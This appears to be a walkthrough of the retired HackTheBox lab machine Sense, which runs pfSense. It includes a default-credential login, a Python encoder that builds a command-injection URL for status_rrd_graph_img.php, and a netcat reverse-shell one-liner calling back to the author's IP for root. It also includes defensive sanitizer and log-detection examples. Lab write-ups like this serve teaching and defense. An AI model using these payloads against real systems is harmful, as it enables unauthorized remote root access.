
Hackthebox.eu - Sense - Retired - Updated



Recon


I've been using threader3000 for my recon scan on HTB. It does a staged scan: first a very quick up/down sweep of all TCP ports, then it pipes the open ports from that sweep into an nmap scan. It automatically saves the nmap results as XML, which I then convert to HTML to make it pretty.




xsltproc ./10.10.10.60/10.10.10.60.xml -o ./sense.html





Just two ports open, 80 and 443. Port 80 looks like lighttpd 1.4.35.


When I try to browse using the DNS name I added to my /etc/hosts,


I get this message.



Weird.


First it redirects me to HTTPS, then I get this error message.


If I try it by IP address,




We get redirected to HTTPS again, and this time we get a login page for pfSense,

which is an open source firewall project.






https://www.pfsense.org/


A quick Google search shows the default credentials for this should be


Username: admin

Password: pfsense


But that doesn't work.


Not much to go on now. Let's see if there is anything else on the web server by brute-forcing other directories and files with dirb.




Dirb found some new directories, but not much to go forward with.


We still don't have much of anything to go on, so let's try scanning with another tool and a different list to see if we get different responses. It's always a good idea to try multiple tools and multiple lists.


This time I used DirBuster with the list

/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 


I added txt,html,conf,bak,sh to the file extension options to look for different file types too.


And with the different list we did see a couple of new files:



Changelog.txt and system-users.txt


Let's see what the changelog.txt has in it.


https://10.10.10.60/changelog.txt



# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window


2 of 3 vulnerabilities have been patched. Well, that means there is one that hasn't, right? Good news for us.


What about system-users.txt?


https://10.10.10.60/system-users.txt



####Support ticket###

Please create the following user


username: Rohit
password: company defaults



OK, it looks like a ticket asking for an account named rohit to be created with the company default password.


Now does that mean the company's Sense.htb's default password or the default password for the company that made the software?


We would have no idea what the internal default password for the Sense company might be, but we did already find the default password set up by pfSense:


Password: pfsense


Let's try logging in with


Username: rohit

Password: pfsense



It worked. Let's see if we can figure out a way to get code execution from this panel somewhere.





Exploit



It took me a while to find a non-metasploit path forward here.


I eventually came across a couple of blogs.


https://spencerdodd.github.io/2018/01/14/pfsense-arbitrary-code-execution/


The first shows that the RRD graph page is vulnerable to RCE because, during the sanitization of the user input, they neglected to strip out the "|" character, which we can use to pipe to other commands. They also said that if you octal-encode your payload you can bypass the sanitization altogether.


So combining these, we can use the pipe to get a second command executed, and if we octal-encode that command we can issue any command we want.
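As an added illustration of why this class of flaw happens and what the fix looks like (my own sketch for this writeup, not pfSense's code and not part of the original post): a deny-list sanitizer that forgets one character still lets a shell operator through, while an allow-list check on the parameter, combined with passing it as a single argv element and never through a shell, leaves nothing for "|" or ";" to do. The `graph-helper` command name is a placeholder.

```python
import re

# Illustrative deny-list sanitizer in the spirit of the flaw described above.
# This is my own sketch, NOT pfSense's real code: it strips ';' but forgets '|'.
def denylist_sanitize(value: str) -> str:
    return value.replace(";", "")

# Allow-list: a graph database name is only letters, digits, '_', '-' and '.'.
# Backslashes, quotes and shell operators are all outside the set, so an
# octal-escaped printf payload is rejected before anything could decode it.
_DB_NAME = re.compile(r"[A-Za-z0-9_.-]+")

def is_valid_database(value: str) -> bool:
    """True only if the whole string is a plain database name."""
    return _DB_NAME.fullmatch(value) is not None

def has_shell_metachar(value: str) -> bool:
    """True if the string still carries a character a shell treats specially."""
    return re.search(r"[;|&`$()<>\\'\"]", value) is not None

def safe_argv(database: str) -> list:
    """Build an argv list for a hypothetical graph helper ('graph-helper' is a
    placeholder). Run with subprocess.run(argv) and no shell=True, the value is
    exactly one argument and can never become a second command."""
    if not is_valid_database(database):
        raise ValueError(f"rejected database parameter: {database!r}")
    return ["graph-helper", "--db", database]

if __name__ == "__main__":
    attempt = "queues;printf+'\\160'|sh"   # constructed hostile value
    print("deny-list leaves:", denylist_sanitize(attempt))
    print("allow-list accepts:", is_valid_database(attempt))
    print(safe_argv("queues"))
```

The allow-list rejects the octal-escaped form too, because a backslash is simply not a valid character in a database name; a filter that only removes known-bad characters can never keep up with every encoding the target's own tools (printf, sh) are willing to expand.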


I then found this site with a PoC in Python.


https://vulners.com/packetstorm/PACKETSTORM:145909


I had trouble getting the PoC to work, but I did borrow from its code to create a little encoding Python script for my own use.


import sys

# The command to encode comes in as the first command-line argument
stager = sys.argv[1]
encoded = ""

print(sys.argv[1])
# Octal-encode every character as \NNN so printf on the target expands it back
for c in stager:
    encoded += ("\\" + oct(ord(c)).lstrip("0o"))

# Build the final request: the database parameter ends with ';' to start a new
# command, printf decodes the escapes, and the result is piped into sh
exploit_url = "https://10.10.10.60/status_rrd_graph_img.php?database=queues;" + "printf+" + "'" + encoded + "'|sh"
print(exploit_url)



It accepts an argument from the command line, octal-encodes it, and inserts it into what the final URL will be.
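From the defender's side, here is an added example (mine, not from the post and not from pfSense) of how an analyst could spot this request pattern in web server access logs: it pulls the `database` parameter out of each request to status_rrd_graph_img.php, expands any printf-style octal escapes so the payload becomes readable, and flags values that contain shell operators. The two log lines are constructed for the example; the first reuses the request shape shown in this post, the second is an ordinary graph request that should not be flagged.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined log format, NOT real logs).
SAMPLE_LOG = r"""10.10.14.10 - - [01/Jan/2021:12:00:00 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+'\160\151\156\147\40\55\143\40\64\40\61\60\56\61\60\56\61\64\56\61\60'|sh HTTP/1.1" 200 512
10.10.14.11 - - [01/Jan/2021:12:00:01 +0000] "GET /status_rrd_graph_img.php?database=queues&graph=4hr HTTP/1.1" 200 9104"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
OCTAL_RE = re.compile(r"\\([0-7]{1,3})")
SHELL_META_RE = re.compile(r"[;|&`$]")

def decode_octal(s: str) -> str:
    """Expand printf-style \\NNN escapes back into characters (the inverse of
    the encoder script above)."""
    return OCTAL_RE.sub(lambda m: chr(int(m.group(1), 8)), s)

def get_param(query: str, name: str) -> str:
    """Return one query parameter. Splits only on '&' so that ';' and '|'
    inside a value survive for inspection."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key == name:
            return unquote_plus(value)
    return ""

def inspect_line(line: str):
    """Return a finding dict for one log line, or None if it is not a request
    to the RRD graph page."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/status_rrd_graph_img.php"):
        return None
    raw = get_param(url.query, "database")
    decoded = decode_octal(raw)
    return {
        "client": line.split(" ", 1)[0],
        "raw": raw,
        "decoded": decoded,
        "suspicious": SHELL_META_RE.search(decoded) is not None,
    }

def scan_log(text: str) -> list:
    """All suspicious findings in a block of log text."""
    findings = (inspect_line(line) for line in text.splitlines())
    return [f for f in findings if f and f["suspicious"]]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} ran: {f['decoded']}")
```

The parameter extractor splits on "&" by hand rather than using parse_qs, whose handling of ";" as a separator changed between Python versions and would otherwise cut the value in half. Decoding before reporting is what turns an opaque string of escapes into the actual command the attacker ran, which is what the analyst needs to tell a harmless ping check from a reverse shell.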


I wanted to start with a bit of a PoC of my own. I just want to see if I can get Sense to ping back to my computer.


So first let's start up tcpdump to listen for ICMP on my VPN tunnel interface:


sudo tcpdump -i tun0 -n icmp


Then, with my little encoder script, which I named encoder.py,


I encoded "ping -c 4 10.10.14.10":


python3 ./encoder.py "ping -c 4 10.10.14.10"


Which gave me the following output.





ping -c 4 10.10.14.10
https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\160\151\156\147\40\55\143\40\64\40\61\60\56\61\60\56\61\64\56\61\60'|sh



I copied that link into Firefox and...





We got pings back.


So we have confirmed the RCE on pfSense.


So let's try netcat now to get a reverse shell.


First let's set up our listener:

nc -lnvp 5555


I had trouble getting nc to work; I couldn't get a reverse shell back. My guess at this point was that nc is restricted somehow or is an incompatible version.


I tried a bunch of different variations of a reverse shell and finally found one that worked, from

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp



Netcat OpenBSD

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f


First I modified it to use my VPN IP and port:


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



Then I ran that through the little encoder.py:


python3 ./encoder.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 5555 >/tmp/f



And I got this back as the encoded URL:


https://10.10.10.60/status_rrd_graph_img.php?database=queues;printf+'\162\155\40\57\164\155\160\57\146\73\155\153\146\151\146\157\40\57\164\155\160\57\146\73\143\141\164\40\57\164\155\160\57\146\174\57\142\151\156\57\163\150\40\55\151\40\62\76\46\61\174\156\143\40\61\60\56\61\60\56\61\64\56\61\60\40\65\65\65\65\40\76\57\164\155\160\57\146'|sh


And once that was pasted back into Firefox,



We got our shell as root.


Let's grab those flags and call it a day.





And just for grins and giggles I checked on the nc reverse shell I had problems with in the beginning and saw this.


This version of netcat doesn't allow you to attach an executable to the connection using -e,


unlike most versions of netcat.




